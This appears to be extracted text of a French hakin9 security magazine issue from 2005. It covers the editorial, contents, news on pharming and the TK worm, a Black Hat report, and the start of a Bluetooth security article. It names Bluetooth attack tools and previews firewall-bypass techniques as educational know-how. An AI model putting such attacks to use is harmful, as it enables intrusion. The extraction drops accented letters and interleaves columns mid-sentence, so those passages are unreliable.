Un bredouillement...

Les confrences de presse des

entreprises s'occupant de la scurit
IT prennent parfois un tournant sur-
prenant. Bien que les invits soient
d'habitude les reprsentants des
mdia spcialiss, on peut entendre
des choses incroyables.
Imaginons qu'un confrencier met
Rdacteur en chef
Roman Polesek
dans un sac les virus, les vers,
adware et spyware. Les script-kid-
dies ne sont d'aprs lui que des hackers solitaires et
programmeurs qui crivent des virus de bas niveau. Bien
sr, il ne faut pas exiger qu'un spcialiste en marketing ait
une connaissance approfondie des questions informatiques,
mais les paroles se rpandent dans les airs et parviennent
aux reprsentants de diffrents magazines. De cela, pour
un lecteur ordinaire, les notions de hacker et hacking sont
depuis toujours associes aux vols d'identit ou aux warez.
Dans notre (et votre) magazine, il s'agit d'une chose tout
fait diffrente nous tenons au savoir-faire et la scurit.
videmment, nous prenons parfois le point de vue du crimi-
nel, mais cela uniquement pour faire comprendre les mtho-
des qu'il utilise. Pour nous, la cybercrminalit ne diffre en
rien des vols des voitures ou des sacs des vielles dames.
Quand nous publions des textes sur les failles de scurit
dans les technologies concrtes par exemple le Bluetooth
(p. 12) ou l'IDS (p. 50) notre intention est de dmontrer
le phnomne et les dangers pouvant menacer les utilisa-
teurs. Si nous nous proccupons de la cration des troyens
invisibles (p. 34), c'est pour vous sensibiliser ce type de
problmes et, peut-tre, attirer l'attention des diteurs de
programmes. Il est facile de remarquer que nous n'utilisons
pas le mot hacker dans une acception impropre de ce terme,
et la prsentation de la possibilit de rechercher les donnes
confidentielles dans Google (p. 22) est un prtexte pour
montrer les possibilits de ce moteur de recherche.
Nous faisons confiance nos lecteurs et nous sommes
srs qu'ils connaissent la diffrence entre un hacker et un
pirate (cracker). Nous sommes conscients que les techniques
prsentes dans notre magazine peuvent tre utilises des
fins ignobles. Mais nous sommes fiers que tous les deux mois,
nos lecteurs obtiennent une nouvelle portion du savoir.
Roman Polesek
romanp@hakin9.org
Dossier
Scurit des connexions Bluetooth
12 Tomasz Rybicki
Vous trouverez dans cet article le modle de scu-
rit de la technologie Bluetooth. Les mthodes et les outils
servant s'attaquer aux priphriques avec l'interface Blue-
tooth seront prsentes. Les mthodes du fonctionnement
des virus agissant sur cette plate-forme y seront galement
analyses.
Focus
Google dangereux la recherche
22 des informations confidentielles
Micha Piotrowski
Cet article montre comment le moteur de recherche Google
peut tre utilis pour rechercher les informations confidentielles
et les objectifs potentiels des attaques ainsi que les techniques
avances de recherche et leurs rsultats surprenants.
Pratique
Contourner discrtement les pare-
34 feux personnels dans Windows
Mark Hamilton
L'article a pour but de prsenter comment dtourner
les pare-feux personnels pour Windows. Vous appren-
drez comment crer un outil logiciel qui se connectera
Internet par l'intermdiaire d'une autre application de
confiance.
Rcupration des donnes partir
42 des systmes de fichiers Linux
Bartosz Przybylski
Comment rcuprer les fichiers importants dans le systmes
de fichiers ext2, ext3 et ReiserFS ? Vous connatrez les prin-
cipes du fonctionnement de diffrents systmes de fichiers
et les outils servant rcuprer les donnes.

La revue hakin9 est publie en 7 versions :

Si vous tes intress par lachat

de licence de publication de
revues merci de contacter :

Monika Godlewska
e-mail : monikag@software.com.pl

tl : +48 (22) 860 17 61

fax : +48 (22) 860 17 71 polonaise tchque italienne
 Le priodique est publi par
Software-Wydawnictwo Sp. z o.o.

Science
Software-Wydawnictwo Sp. z o.o.,
Lewartowskiego 6, 00-190 Varsovie, Pologne
Tl. +48 22 860 18 81, Fax. +48 22 860 17 70
www.hakin9.org

Les systmes de dtection dintru- Directeur de la publication : Jarosaw Szumski

50 sion vus de l'intrieur
Antonio Merola
Quelles sont les mthodes du fonctionnement des sys-
tmes de dtection des intrusions, leurs types et les
diffrences entre elles ? Quelles sont les techniques qui
peuvent tre utilises par l'intrus pour dtecter ou dsac-
tiver l'IDS ?
Stganographie rseau dissimuler
58 des donnes dans les en-ttes TCP/IP
ukasz Wjcicki
L'article prsente en quoi consiste la dissimulation des donnes
dans les en-ttes TCP/IP. Vous apprendrez o et comment
cacher les donnes et connatrez les outils permettant une
communication secrte l'aide de la stganographie rseau.
Imprimerie, photogravure : 101 Studio, Firma Tgi
Ekonomiczna 30/36, 93-426 d
Imprim en Pologne/Printed in Poland
Abonnement (France mtropolitaine) : 1 an (soit 6 numros) 38
DOM/TOM, tranger : nous consulter
Dpt lgal : parution
ISSN : 1731-7037
Commission paritaire : en cours
Distribution : MLP
Parc dactivits de Chesnes, 55 bd de la Noire
BP 59 F - 38291 SAINT-QUENTIN-FALLAVIER CEDEX
(c) 2005 Software-Wydawnictwo, tous les droits rservs
Rdacteur en chef : Roman Polesek romanp@hakin9.org
Rdactrice adjointe : Paulina Nowak paulinan@software.com.pl
Secrtaire de rdaction : Tomasz Nidecki tonid@hakin9.org
Maquette : Anna Osiecka annao@software.com.pl
Couverture : Agnieszka Marchocka
Traduction : Grayna Wena, Iwona Czarnota, Marie-Laure Perrotey,
Batrice Ginier-Gillet
Correction : Jrmie Fromaget, Jean-Franois K@sparov, Gabriel

Fiche technique
Campana, Gilles Gaffet, Sebastien Lecocq, Pierre-Emmanuel Leriche,
Gilles Fournil, Pierre Mennechet, Jeremy Canale

Les personnes intresses par la coopration sont pries de nous

Dtection du sniffing dans les
68 rseaux commuts
Daniel Kaczorowski, Maciej Szmit
Vous y trouverez les mthodes exploites pour sniffer dans
les rseaux commuts : MAC-flooding et ARP-spoofing.
L'article prsente les mthodes de dtecter ce type de snif-
fing, ainsi que les outils qui peuvent vous aider.
Tor
76 Tomasz Nidecki
Cest un proxy anonyme fonctionnant sur le principe
du rseau distribu. Il permet toutes les applications qui
possdent SOCKS4 d'tablir des connexions anonymes,
slectionnes de faon alatoire dans le rseau de relais.
Il est galement possible de dmarrer notre propre relais.
08 Actus
Les nouvelles du monde de la scurit des syst-
mes informatiques.
contacter : cooperation@software.com.pl
Abonnement : abonnement@software.com.pl
Fabrication : Marta Kurpiewska marta@software.com.pl
Diffusion : Monika Godlewska monikag@software.com.pl
Publicit : adv@software.com.pl
La rdaction fait tout son possible pour sassurer que les logiciels sont jour,
pourtant elle dcline toute responsabilit pour leur utilisation. Elle ne fournit pas
de support technique li linstallation ou lutilisation des logiciels enregistrs
sur le CD-ROM. Tous les logos et marques dposs sont la proprit de leurs
propritaires respectifs.
La rdaction utilise le systme PAO
Pour crer les diagrammes on a utilis le programme
Le CD-ROM joint au magazine a t test avec AntiVirenKit de la socit G Data
Software Sp. z o.o.
AVERTISSEMENT
Les techniques prsentes dans les articles ne peuvent
tre utilises qu'au sein des rseaux internes.
La rdaction du magazine n'est pas responsable de l'utili-
sation incorrecte des techniques prsentes.
L'utilisation des techniques prsentes peut provoquer la
perte des donnes !

anglaise allemande franaise espagnole

 Feuilleton
Tomasz Nidecki
Essaie de mattraper
U
ne chaude soire dt. Le propritaire du cyber
caf du quartier, coll lcran de son ordina-
teur, joue Half-Life. Un jeune homme, habill
trs chic, entre dans le caf. Il porte les lunettes Gucci
et une chemise soigneusement repasse. Le jeune
homme affiche un large sourire. Il paye au comptoir une
heure de connexion Internet. La serveuse, jeune amie
du propritaire, est moiti endormie et ne fait pas sp-
cialement attention au jeune homme. Elle est fascine
par les articles de la presse people quelle est en train
de feuilleter.
Le jeune homme prend place dans un coin et branche
sa cl USB lordinateur. Dun air impassible, lhomme
narrte pas de pianoter sur le clavier. Les habitus du
caf ne font pas attention lui non plus, car ceux-l
sont captivs par les jeux en ligne et par la drague via le
chat. Le jeune homme quitte le caf avant que lheure ne
scoule, tout en souriant gentiment. La serveuse mur-
mure peine un au revoir.
Quelques jours plus tard, le caf est encercl par des
hommes cagouls. Le propritaire est sous le choc. Lui
et son amie sont menotts et embarqus dans un camion
de police. On apprend que quelques jours auparavant,
les archives de la DST ont t visites et les malfaiteurs
ont drob des donnes ultra confidentielles. Linfrac-
tion a t commise partir de ladresse IP attribue au
propritaire du cyber caf. Le propritaire tente en vain
dexpliquer quil ne peut pas rpondre des actes de ses
clients. Il fallait demander aux clients des pices diden-
tit et noter leurs numros rtorque le procureur.
Cette histoire nest pas relle mais elle peut bientt
le devenir. L encore, il ny aura pas de justifications
possibles. La victime pourrait tre non seulement un pro-
pritaire dun cyber caf mais aussi bien le propritaire
dune entreprise qui na aucun rapport avec lInternet
par exemple, un restaurateur qui aurait mis en place un
hot spot pour ses clients, ou bien encore ladministrateur
dun rseau local qui fonctionnerait avec un systme Wi-
Fi. Une fois de plus, les justifications, en cas deffraction,
ne serviront rien. Qui va chercher le vrai coupable def-
fraction ? Les preuves seront solides et ladresse IP sera
suffisamment parlante.
Passer inaperu est un jeu denfant pour un cam-
brioleur qui pntre dans un rseau. Lpoque o le
malfrat devait tablir une connexion travers cinq
4 www.hakin9.org
serveurs diffrents pour arriver jusqu la victime tout
en masquant lorigine deffraction, est dfinitivement
termine. Les cybers cafs ont permis aux malfrats un
vrai anonymat. Cependant, ces cafs ntaient pas pour
eux trs pratiques. Le pirate tait contraint dutiliser un
ordinateur et le payer. prsent, les cybers pirates
peuvent exprimer leur infinie gratitude ceux qui ont
invent des hot spots gratuits. Maintenant, il leur suffit
dquiper le micro portable en carte Wi-Fi et sasseoir
sur un banc pour pouvoir capter tout le rseau. Et com-
ment identifier ces individus ? Daprs une adresse
MAC ? Vous voulez rire ! Dans ce cas prcis, ils restent
totalement impunis !
Les hots spots deviennent de plus en plus populaires.
Les commerant y recourent de plus en plus pour attirer
les clients. Mme un petit restaurant dans mon quartier
affiche une pancarte publicitaire qui allche la clientle
avec une entre libre sur l'Internet. Je suis cependant
persuad que ce restaurateur na pas rflchi ce quil
puisse advenir, si lun de ses clients cambriolait une
banque partir du rseau install dans son commerce.
Il a d penser que les voleurs iront plutt chez le voisin.
Mme sans les hots spots, la technique Wi-Fi est trs
peu scurise. Chaque rseau sans fil est une vraie pas-
soire. Beaucoup dhabitants dimmeubles optent pour le
rseau Wi-Fi, lequel leur permet de contourner les autori-
sations des syndics pour faire passer le cble dun balcon
lautre, ou installer ce cble via le rseau tlphonique.
La technique Wi-Fi est adopte par les entreprises les-
quelles ne veulent pas investir dans une infrastructure
cble. Violer laccs dun rseau Wi-Fi est non seule-
ment beaucoup plus simple que de faire une effraction
dans un rseau cbl, mais de plus, cette technique
empche de trouver l'auteur du crime. Car comment
tablir quel individu tel jour et telle erreur se trouvait
proximit du rseau (pas forcment dans les locaux de
lentreprise ou dans l'immeuble mais par exemple dans la
cour) avec un ordinateur.
Je suis peut-tre un rleur nostalgique, cependant,
je regrette le bon vieux temps. Je prfre avoir moins
de facilit pour me connecter lInternet mais en revan-
che, tre certain de pouvoir identifier un pirate potentiel
et le prendre sur le fait. Alors, pour protester contre cette
menace, je reste fidle au rseau BNC. Cela me permet
de dormir tranquillement. n
hakin9 N o 4/2005

hakin9.live
Contenu du CD
S
ur le CD joint la revue, vous trouverez
hakin9.live (h9l) en version 2.5.2 distribution
Linux bootable intgrant les outils ncessaires,
la documentation, les tutoriaux et les matriaux compl-
mentaires aux articles.
Pour commencer utiliser hakin9.live, il suffit de
dmarrer l'ordinateur avec le CD insr dans le lecteur.
Les options supplmentaires concernant le dmarrage
du disque (le choix de la langue, une autre rsolution,
la dsactivation du framebuffer, etc.) ont t dcrites dans
la documentation disponible sur le CD c'est le fichier
help.html (si vous voulez le lire partir du h9l dmarr,
le fichier se trouve dans /home/haking/help.html).
Quoi de neuf ?
La version 2.5.2 h9l est base sur Aurox Live 10.2.
Le systme tourne sous la surveillance du noyau 2.6.9.
La dtection du matriel a t corrige et la configuration
du rseau amliore. Le menu est galement standar-
dis tous les logiciels ont t regroups dans les cat-
gories adquates, ce qui offre l'accs aux applications
donnes beaucoup plus intuitif. La nouvelle hakin9.live
intgre plusieurs nouveaux matriaux supplmentaires
les documents RFC mis jour, quelques livres gratuits
au format PDF et HTML et les articles non publis. Le hit
de ce numro est une publication intitule An Introduction
to Security (auteur collectif) au format PDF et TXT.
Figure 1. hakin9.live vous offre plusieurs outils
disponibles sur un CD
6 www.hakin9.org
Dans la version actuelle de h9l, il y a galement les
nouveaux logiciels comme :
un jeu d'outils permettant de raliser les attaques
contre la pile du protocole Bluetooth (RedFang, bts-
canner, bt_audit, Blooover, Bluesnarfer, BlueSpam
et d'autres),
un ensemble d'applications pour warXing sous Win-
dows (versions d'installation),
Postfix, MTA populaire (et les autres logiciels de mes-
sagerie lectronique Mutt, Pine, Sylpheed-Claws),
applications audio de test (cplay, mp3blaster,
mpg321),
quelques nouveaux jeux texte.
C'est fluxbox, avec le gestionnaire ROX et le moniteur
systme Torsmo qui est actuellement l'environnement
graphique par dfaut. Un tel ensemble se prsente bien,
il est hautement configurable et ses exigences matriel-
les ne sont pas leves. En mme temps, il est possible
de dmarrer Xfce 4 en version 4.2.1.1 (option de dmar-
rage hakin9 xfce4).
Tutoriaux et documentation
La documentation contient, hormis les astuces concer-
nant le dmarrage et la gestion de hakin9.live, les tuto-
riels prpars par la rdaction comprenant les exercices
pratiques. En ce qui concerne les tutoriels, nous prsup-
posons que vous utilisez hakin9.live. Ainsi, vous vitez les
problmes lis aux diffrentes versions des compilateurs,
un autre emplacement des fichiers de configuration ou
aux options indispensables pour dmarrer un logiciel
donn dans un environnement choisi.
La version actuelle de hakin9.live, outre les tutoriaux
des ditions prcdentes, en intgre deux nouveaux. Le
premier montre comment communiquer en utilisant la
stganographie rseau (et les en-ttes TCP/IP).
Le second concerne la rcupration scure des don-
nes partir des systmes de fichiers dans Linux. Ce
doument dcrit la mise en pratique du savoir-faire com-
pris dans l'article Rcupration des donnes partir des
systmes de fichiers Linux. n
Figure 2. Plusieurs nouveaux matriaux
supplmentaires
hakin9 N o 4/2005
Sil vous est impossible de lire le CD, et ce dernier nest pas endommag mcaniquement, essayez de le lire au moins dans 2 lecteurs.

Actus
Amende pour une bonne
volont
Le chambre du tribunal correction-
nel de Paris a condamn Guillaume
Ten verser une amende de 5 000
euros avec sursis pour avoir viol
la loi sur la proprit intellectuelle.
C'est un prcdent judiciaire en
France.
Ten a t accus d'avoir publi
en 2002 les informations sur
les failles de scurit dans le
programme anti-virus Viguard.
Il a obtenu les donnes en ques-
tion par le biais du reverse engi-
neering bien qu'avant de publier
ses rvlations dans l'Internet,
il en avait inform l'diteur du
programme.
Les arguments de la dfense
que Guillaume Ten a agi pro
publico bono n'ont pas t pris en
compte. partir de cette dcision,
on peut constater qu'en France
il sera interdit d'examiner du code
ferm pour rechercher ses vul-
nrabilits, en particulier, si ces
informations sont rendues publi-
ques par la suite.
MeetBSD international
Entre 1719 juin 2005, Cracovie,
aura lieu la seconde dition de la
confrence MeetBSD, consacre
comme son nom l'indique aux
systmes de la famille BSD. Cette
fois-ci, cet vnement a une dimen-
sion internationale. La confrence
est organise par la fondation
Proidea. Le patron mdia est le
magazine hakin9.
Trois jours d'ateliers et de cours
trs intressants autant pour
les newbies que pour les avancs
seront remplis de sujets troite-
ment lis aux systmes bass sur
le noyau de Berkeley. Poul-Hen-
ning Kamp, Dru Lavigne et Robert
Watson, les dveloppeurs de
FreeBSD, sont parmi les invits.
Tous les participants obtiendront
un certificat de participation la
confrence et beaucoup de mat-
riaux supplmentaires.
8 www.hakin9.org
L're du pharming
a commenc
Comme l'a dit Chris Risley, prsident
de l'entreprise Nominum, le phishing
est au pharming ce que le pcheur
est au chalutier russe. Les phishers
doivent intercepter leurs victimes une
par une, utilisant pour cela les tech-
niques de spam et comptant sur la
navet des utilisateurs, alors quune
attaque russie d'un pharmer signifie
mille, voire des millions de victimes
potentielles.
La diffrence entre le pharming
et le phishing consiste en ce que
les victimes sont rediriges vers les
pages substitues sans aucune action
de l'utilisateur lui-mme. La technique
la plus utilise pour cela est le DNS
Cache Poisoning, mais il arrive qu'on
utilise des programmes malicieux
(notamment Banker) modifiant la con-
figuration de Windows (par exemple
le fichier HOSTS). Parfois, les phar-
mers se servent de la sociotechnique
et redirigent les paramtres du
domaine chez l'enregistreur vers leurs
serveurs DNS. Le but est toujours le
mme : en accdant une page, par
exemple la page de sa banque, l'uti-
lisateur doit en fait aller une adresse
IP tout fait diffrente bien sr, gent le problme et sont d'avis que le
contrl par le voleur et entrer ses
donnes confidentielles.
Le DNS Cache Poisoning con-
siste introduire dans le serveur
cache DNS une fausse adresse pour
le domaine attaqu. Ce n'est pas une
nouvelle mthode elle a t dcou- de la version du systme d'exploita-
verte la fin des annes 90 et la plu-
part des serveurs DNS ont t dj
protgs contre celle-ci. Mais est-ce
vrai ? Bind 8.x et DNS cache Win-
dows NT4 et 2000 contenaient encore
les failles permettant de l'utiliser.
Vu la petite popularit de ces types
d'attaques, on ne leur a pas accord
deimportance tant que leurs possibi-
lits n'taient pas dcouvertes par les
voleurs. C'est le dbut du pharming.
La premire attaque de masse a
eu lieu il y a peine quelques mois,
en mars 2005. L'attaque visait aux
versions vulnrables des pare-feux
de Symantec avec DNS Cache int-
gr. Les employs de plus de 500
grandes entreprises sont tombs
dans le pige. Les adresses popu-
laires, comme www.google.com,
www.ebay.com ou www.weather.com
(plus de 1300 domaines au total), redi-
rigeaient vers une page installant des
programmes spyware. Ensuite, deux
redirections successives ont eu lieu
l'une vers un site installant le spyware,
et le second vers une page avec
la publicit des mdicaments aug-
mentant la puissance sexuelle. Elles
exploitaient aussi les vulnrabilits
dans les versions plus anciennes de
Windows. Pendant la premire atta-
que, d'aprs les donnes obtenues
partir de l'ordinateur compromis
utilis pour hberger les pages avec
les spywares, on a not environ 8 mil-
lions d'appels HTTP partir de plus
de mille adresses IP diffrentes. Ces
nombres sont significatifs.
Bien que pour l'instant le phar-
ming est moins populaire que le
phishing, sa puissance est encore
plus grande. Dans l'Internet, il existe
encore beaucoup de serveurs DNS
vulnrables ces types d'attaques.
De plus, certains grands fabricants
des programmes de protection ngli-
phnomne n'est pas suffisamment
important pour s'en soucier. Il est plus
difficile de se protger contre le phar-
ming que contre le phishing tous les
utilisateurs du serveur DNS attaqu
y sont vulnrables, indpendamment
tion de l'utilisateur, pas seulement
ceux qui ont cliqu sur le liens dans
une lettre obtenue ou ceux qui n'ont
pas mis jour leurs Windows.
prsent, la seule mthode
efficace pour se protger contre le
pharming consistent vrifier les cer-
tificats des pages visites (bien sr
travers une connexion sre). Outre
cela, les banques devraient, outre la
liste des mots de passe d'autorisation,
utiliser une autre mthode d'autori-
sation, par exemple les jetons ou les
cartes de codes uniques.
Les informations plus dtailles
sur les techniques prsentes dans
le prochain numro du magazine
hakin9.
hakin9 N o 4/2005

Un cracker condamn
21 mois de prison
g de 21 ans, Raymond Paul Stei-
gerwalt, le pirate amricain, accus
d'avoir infect le Dpartement de la
Dfense des tats Unis (Department
of Defense) par le ver TK worm, a t
puni d'une peine de 21 mois dincar-
cration. S'y ajoute un ddommage-
ment de 12 000 dollars au profit du
Dpartement de la Dfense. Il parat
que Steigerwalt est devenu un bouc
missaire et tait puni pour tous les
auteurs du ver.
TK worm a t identifi pour la pre-
mire fois dans la 1re moiti de 2002.
Il exploitait les failles dans le serveur
Microsoft Internet Information Services
pour se diffuser et installer les portes
drobes contrles par les concep-
teurs du ver. Au moins deux ordina-
teurs appartenant au Dpartement de
la Dfense ont t contamins.
Microsoft :
chec du quiz de la scurit
Organis dans l'Internet par Micro-
soft le concours pour les spcialistes
de la scurit, The Gatekeeper, a
t interrompu. Il s'est avr que
les participants falsifiaient les notes.
Microsoft a constat que le concours
sera rtabli ds que cela sera possi-
ble. Cette raction ressemble un peu
celle l'information sur les failles
de scurit dtectes dans leurs
programmes.
D'aprs l'entreprise, aux con-
cours, qui devrait durer 12 jours
(214 mai), plus de 20 mille infor-
maticiens de 20 pays ont pris part.
Ils devaient rpondre deux ques-
tions de choix multiple par jours,
rivalisant avec les meilleurs com-
patriotes cette tape, le prix
tait un TabletPC, et le vainqueur
aurait particip en tant que VIP
dans la confrence TechEd. Hlas,
ce fut un chec.
La vitrine du quiz fonctionnait
uniquement avec le navigateur
Inernet Explorer. Peu importe. Pire
encore le systme refusait souvent
d'enregistrer les rponses correc-
tes et affichait le message d'er-
hakin9 N o 4/2005
Le ver permettait de prendre
le contrle des systmes infects
travers les canaux IRC. Il permet-
tait d'excuter plusieurs processus
dangereux au niveau de la machine
infecte partir du scannage
des autres machines pour dtec-
ter les failles dans les systmes
de protection jusqu'aux attaques
DDoS contre d'autres ordinateurs
et rseaux. En 2002 en Grande
Bretagne, TK worm a entran les
pertes financires de plus de 5,5
millions livres.
Steigerwalt a t aussi con-
damn pour la dtention d'images de
pornographie infantile. Entre 2002
et 2003, il tait membre du groupe
Thr34t Krew (TK), souponn d'avoir
cr le ver TK worm.
reur 404: file not found. De plus,
il n'y avait aucun problme avec
une fausse rponse : il suffisait
de revenir la page prcdente provoqu les plus grandes contro-
et choisir encore une fois la rponse
correcte, sans perdre les points.
Mais le plus grand problme tait
qu'aprs deux jours de concours
au maximum, on pouvait remporter
350 points par jours les meilleurs
avaient mme 1750 points.
Il n'y a pas de raisons de soup-
onner Microsoft d'une mauvaise
volont : du point de vue de l'en-
treprise, cela n'a aucun sens. Mais
plusieurs spcialistes de tant de
pays taient sans doute dus. Blue
Screen of Death a dtruit les plans de
promotion de l'entreprise d'autant
plus, qu'elle est le plus grand diteur
des systmes d'exploitation.
The Gatekeeper, devrait tre
considr comme un dfi. La per-
sonne qui lavait gagn, aurait pu se
considrer comme un vrai expert en
matire de la scurit. Ceux qui ont
falsifi le nombre de points, nont rien
gagn et en plus ils ont rendu la vic-
toire du concours impossible.
www.hakin9.org
Spyware une affaire en or
D'aprs le rapport de l'entreprise
Webroot, la production des pro-
grammes de type spyware devient
une affaire en or : les bnfices
annuels de cette branche atteignent
2 milliards de dollars. Le document
publi contient aussi une thse
audacieuse que ce procd peut
mme faire obtenir 25 % de march
de la publicit dans l'Internet.
Les programmes affichant de la
publicit ou redirigant les navi-
gateurs vers des adresses non
souhaites constituent, d'aprs les
tudes, plus de la moiti de toutes
les infections. Bien que la cons-
cience des utilisateurs augmente,
les infections sont de plus en plus
frquentes.
Les statistiques sont effrayantes
depuis janvier jusqu' avril 2005,
environ 90% des machines dans
les entreprises et dans les mai-
sons ont t infectes. Bien que le
nombre de nouveaux programmes
malicieux dtects baisse, les
rgulations lgales incriminant ce
procd n'existent pas. Mme les
tats Unis n'ont pas russi l'anne
pass introduire les rglements
appropris.
Si vous voulez raw soc-
kets , changez de systme
Parmi plusieurs correctifs de scu-
rit inclus dans le Service Pack 2
pour Windows XP, la suppression
de la fonctionnalit raw sockets a
verses. Elle permet de communi-
quer avec le matriel informatique
directement via le rseau.
Le raw sockets (sockets bruts)
facilitent beaucoup la surveillance
et le filtrage du trafic rseau.
D'autre part en cas d'un sys-
tme d'exploitation mal protg
ou mal conu elles peuvent tre
la source des dangers. Cette fonc-
tionnalit est disponible dans tous
les systmes de la famille *NIX.
Mais le plus grand problme
est d au fait que plusieurs appli-
cations rseaux pour Windows
sont bases sur raw sockets. Si
cette solutions est supprime,
les applications augmentant la
scurit deviennent inutiles et ne
sont bonnes rien. Les diteurs
de ces types de programmes ne
prennent pas bonne note des
garantie de Microsoft que cet ugly
hack pourrait augmenter la scu-
rit de Windows, mais l'entreprise
mme ne voit pas la possibilit de
se retirer de cette dcision.
9

Actus
Black Hat Europe 2005
D
u 29 mars au 1 avril 2005 Amsterdam, l'dition
europenne de l'une des plus importantes con-
frences ddies la scurit IT Black Hat
Europe (http://www.blackhat.com) a eu lieu. Pendant
quatre jours, plus de quarante confrences et ateliers,
d'ailleurs trs bien organiss, ont eu lieu. Les prsenta-
teurs, meilleurs spcialistes des quatre coins du monde,
ont surpris les participants par leur savoir-faire et par leur
dmonstration. Le partenaire mdiatique de cette ren-
contre de printemps tait le magazine hakin9.
Les ateliers (appels par Black Hat Trainings) taient
des prsentations pratiques trs bien prpares tout
comme les cours (Briefings), trs apprcis par lquipe
de hakin9. Ces derniers, diviss en deux catgories
simultans, placs les participants devant un dilemme :
que choisir.
Il est difficile d'numrer ici tous les vnements
importants, mais notre quipe a t impressionne par le
cours de Dan Kaminsky, traitant du transfert des donnes
et de l'omission des pare-feux l'aide du protocole DNS.
Dan a dmontr comment, dans les requtes DNS, on
peut transfrer des informations quelconques partir
de chanes de caractres trs simples jusqu'aux donnes
audio et vido. La transmission en ligne voice over DNS
a t accueillie par de vifs applaudissements.
La confrence de l'quipe d'Adam Laurie, le spcia-
liste le plus connu sur la scurit du protocole Bluetooth,
Figure 1. Les formations furent d'un grand intrt
10 www.hakin9.org
a t aussi trs intressante. Nous avons pu revoir la
totalit de toutes les mthodes dattaques connues ainsi
que deux nouvelles, annonces justement pendant cette
confrence. Tout cela, sur des exemples appropris.
Le cours ddi aux failles de scurit dans le noyau
du systme MacOS X a t aussi trs attirant (l'article
l-dessus sera disponible dans le prochain numro de
hakin9). Ilja van Sprundel et Christian Klein ont prouv
que mme un systme trs bien conu, comme le produit
de l'entreprise Apple, n'est pas pourvu de dfauts. Il faut
aussi mentionner la confrence de Job de Haas, consa-
cre la scurit du systme Symbian, conu pour les
priphriques mobiles. Le cours d'Aleksander Kornbrust
concernant les rootkits de bases de donnes tait aussi
une surprise trs agrable.
Hlas, rien n'est parfait et nous avons connu deux
dceptions. La premire tait le cours de Kenneth Geers
sur la scurit rseau en Russie les informations taient
assez banales et on pouvait remarquer une certaine fas-
cination de l'auteur sur la vision informatique russe. Le
deuxime chec, un peu plus lger, tait la confrence
de Jon Callas du PGP Corporation intitul Hacking PGP,
qui pouvait tre traite comme une crypto-publicit de
l'entreprise (un long discours qui s'est termin par la con-
clusion que le PGP est pratiquement inviolable).
Les enregistrements audio et vido et les matriaux
de la confrence sont tlcharger partir du site Web
de Black Hat. Mais la participation personnelle la con-
frence a fourni des impressions inoubliables. Malgr le
prix trs lev plus de 1000 dollars pour deux jours de
confrence la participation ce type d'vnement est
ncessaire pour tous ceux qui veulent tre au courant
des derniers problmes lis la scurit IT. Mais rien
nest fini bien que la confrence amricaine ait dj eu
lieu, la confrence Black Hat Asia au Japon sera tenue
en octobre 2005.
Roman Polesek
Figure 2. L'quipe de hakin9 : Tomasz Nidecki, Roman
Polesek
hakin9 N o 4/2005
 Scurit des
connexions Bluetooth
Tomasz Rybicki
D
e plus en plus de priphriques
communiquent travers Bluetooth
(cf. l'Encadr Bluetooth bondissant).
Ce protocole peut tre utilis, par exemple,
pour connecter un ordinateur portable Inter-
net l'aide d'un tlphone mobile, pour se ser-
vir d'un casque d'coute sans fil, il permet aussi
de construire les rseaux dans les bureaux.
Ses domaines d'application sont pratiquement
illimits.
Pourtant, ce protocole n'est pas trs sr,
et une multitude d'applications deviennent
dangereuses pour l'utilisateur. Il existe dj de
nouveaux virus diffuss via Bluetooth. Derni-
rement, le virus Cabir a sem le trouble, mais
il n'est pas le seul il existe encore Dust, le virus
contaminant les priphriques de type PDA,
et Lasco, trs similaire Cabir, mais beaucoup
Dossier
plus dangereux.
tant donn que le Bluetooth devient de plus
en plus populaire, il est judicieux de s'intresser
aux questions lies sa scurit. Nous com-
mencerons par le modle de scurit prsent
dans la spcification, et nous nous concentre-
rons sur les mthodes et outils permettant de
s'attaquer aux priphriques avec l'interface
Bluetooth. la fin, nous nous occuperons des
12 www.hakin9.org
Bluetooth devient de plus en plus
populaire. En 2005, il y aura plus
de 1,5 milliards de priphriques
munis de cette technologie.
Cependant, Bluetooth peut
tre aussi utilis des fins
malicieuses pour consulter
des donnes prives, causer des
dommages financiers ou mme
pour localiser le propritaire d'un
priphrique.
virus fonctionnant sur ces priphriques de
leur faon de se propager, du fonctionnement
et des mthodes permettant de les liminer.
Ainsi parlait la spcification
La spcification du Bluetooth dtermine trois
nivaux de protection implmenter dans les
priphriques :
niveau 1 sans protection,
niveau 2 la protection au niveau des servi-
ces,
Cet article explique...
comment dtecter les priphriques dots du
Bluetooth,
comment cibler une attaque contre ces pri-
phriques,
comment liminer les virus s'attaquant au Blue-
tooth.
Ce qu'il faut savoir...
au moins les notions de base sur le protocole
Bluetooth.
hakin9 N o 4/2005
 Scurit du Bluetooth

l'adresse du priphrique de
48 bits, l'adresse unique du pri-
Bluetooth bondissant
Bluetooth fonctionne sur la bande de frquence de 2,4 GHz, et plus prcisment phrique concret dtermine par
dans la gamme de 24022480 MHz. La bande est divise en 79 canaux d'une lar- IEEE (Institute of Electrical and
geur de 1 MHz, entre lesquelles sautent les priphriques communiquants. Si ces Electronic Engineers),
priphriques sont synchroniss, un seul canal logique permettant d'envoyer les la cl de chiffrage prive la cl
donnes est cr. utilise pour le chiffrage des don-
Pour un observateur extrieur, les donnes sont tout simplement une srie nes, d'une longueur de 8128
d'impulsions se produisant sur diffrentes frquences, apparemment alatoires. bits (en fonction du pays du fabri-
Les priphriques changent les frquences (canaux) conformment un certain cant),
algorithme. Cet algorithme est diffrent pour chaque connexion tablie dans une
la cl d'authentification prive
zone donne.
cette cl est utilise pour
La premire phase de l'tablissement d'une connexion entre les priphri-
authentifier l'utilisateur, d'une lon-
ques est l'ajustage du client l'algorithme des sauts du serveurs et la phase
dtermine de cet algorithme partir de ce moment, les deux priphriques gueur de 8128 bits (en fonction
sautent ensemble. Ce n'est pas facile, vu que les sauts de frquences s'effec- du pays du fabricant),
tuent 1600 fois par seconde. Pour pouvoir couter la communication entre deux nombre alatoire RAND le
priphriques Bluetooth, il faut couter la squence initialisant la connexion, au nombre pseudo-alatoire, de 128
moment o l'un des priphriques propage les donnes concernant son algo- bits, gnr de temps en temps
rithme de sauts. par le priphrique,
Si dans une zone, plusieurs priphriques fonctionnent, il est probable qu' les algorithmes de la gnra-
un moment plus d'une paire communique travers un canal. Mais ce n'est pas un tion des cls E0, E21 et E22
problme. Le protocole de la transmission des donnes au niveau de la couche de
(cf. l'Encadr Bluetooth et algo-
liaison de donnes assure dans cette situation une solution correcte la transmis-
rithmes E).
sion du paquet erron est rpte sur le premier canal libre.
